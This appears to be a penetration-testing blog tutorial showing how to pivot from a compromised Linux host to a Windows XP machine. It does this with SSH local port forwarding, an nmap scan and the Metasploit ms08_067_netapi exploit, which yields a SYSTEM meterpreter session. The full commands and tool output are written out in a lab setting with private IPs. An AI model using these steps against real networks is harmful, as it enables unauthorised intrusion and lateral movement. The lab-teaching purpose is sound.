SSH (secure shell) is a common encrypted protocol installed by default on almost all linux hosts for remote administration. It provides administrators with command line access to run administrative tasks. Upon successfully owning a machine running SSH, it is trivial to use it to forward connections to another hosts securely. With openSSH, you have 3 methods of forwarding; local port forwarding(-L), remote port forwarding(-R) and SOCKS(-D). We will be using the first method.
Host A is a Linux host with OpenSSH installed by default. Host B is a Windows host without ssh.
Depiction of Hosts:
<Attacker host> ------------------- <Host A> -------------------- <Host B>
IP: 192.168.0.182 eth0: 192.168.0.191 192.168.52.134
eth1: 192.168.52.135
We assume that you have fully compromised Host A with root rights. By doing so, you should already have the root credentials to remotely ssh to Host A, the objective is to further compromise Host B.
On Attacker Host
We map port 445 to localhost using ssh.
# ssh -L 445:192.168.52.134:445 root@192.168.0.191 root@192.168.0.191's password: Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686) Last login: Tue Jun 20 05:59:22 2017 root@hostA:~#
Since we'll be exploiting Host A using msf, I would like to map the meterpreter port 4444
locally too. The above command, we can port fwd 2 services in 1 command:
# ssh -L 445:192.168.52.134:445 -L 4444:192.168.52.134:4444 root@192.168.0.191
On another terminal on Host A, check your netstat:
# netstat -an | more
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:4444 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:445 0.0.0.0:* LISTEN
tcp 0 0 192.168.0.182:49620 192.168.0.191:22 ESTABLISHED
<--snip-->
Now we have 2 ports mapped to localhost. Lets use nmap to fingerpring the OS of host B, note
that Host B is not listening on port 445 on Host A as localhost:
# nmap -A -p 445 127.0.0.1 Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-20 09:16 SGT Nmap scan report for localhost (127.0.0.1) Host is up (0.000088s latency). PORT STATE SERVICE VERSION 445/tcp open microsoft-ds Windows XP microsoft-ds Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.8 - 4.6 Network Distance: 0 hops Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 17h28m05s, deviation: 0s, median: 17h28m05s | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: tt-af6d434411ff | NetBIOS computer name: TT-AF6D434411FF | Workgroup: WORKGROUP |_ System time: 2017-06-20T11:45:10-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server doesn't support SMBv2 protocol OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds
Great! now we can see the OS type is WinXP, lets use msf to exploit it using netapi:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp
I changed the payload to bind_tcp instead of reverse_tcp because the port 4444 is already
listening and reverse_tcp won't work if it is.
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 127.0.0.1 yes The target address RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LPORT 4444 yes The listen port RHOST 127.0.0.1 no The target address Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > run [*] Started bind handler [*] Sending stage (957487 bytes) to 127.0.0.1 [*] 127.0.0.1:445 - Automatically detecting the target... [*] 127.0.0.1:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 127.0.0.1:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 127.0.0.1:445 - Attempting to trigger the vulnerability... [*] Meterpreter session 1 opened (127.0.0.1:40987 -> 127.0.0.1:4444) at 2017-06-20 09:31:22 +0800 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
There you go! Some people might ask, how do I portscan host B from the attacker host? Unfortunately,
because Host B is a Windows machine and doesn't have openSSH installed, we can't setup the SOCKS
service using ssh. If this happens, you got to rely on Host A directly to recon Host B.
In the next article, I will discuss about how to pivot from a Windows host.
No comments:
Post a Comment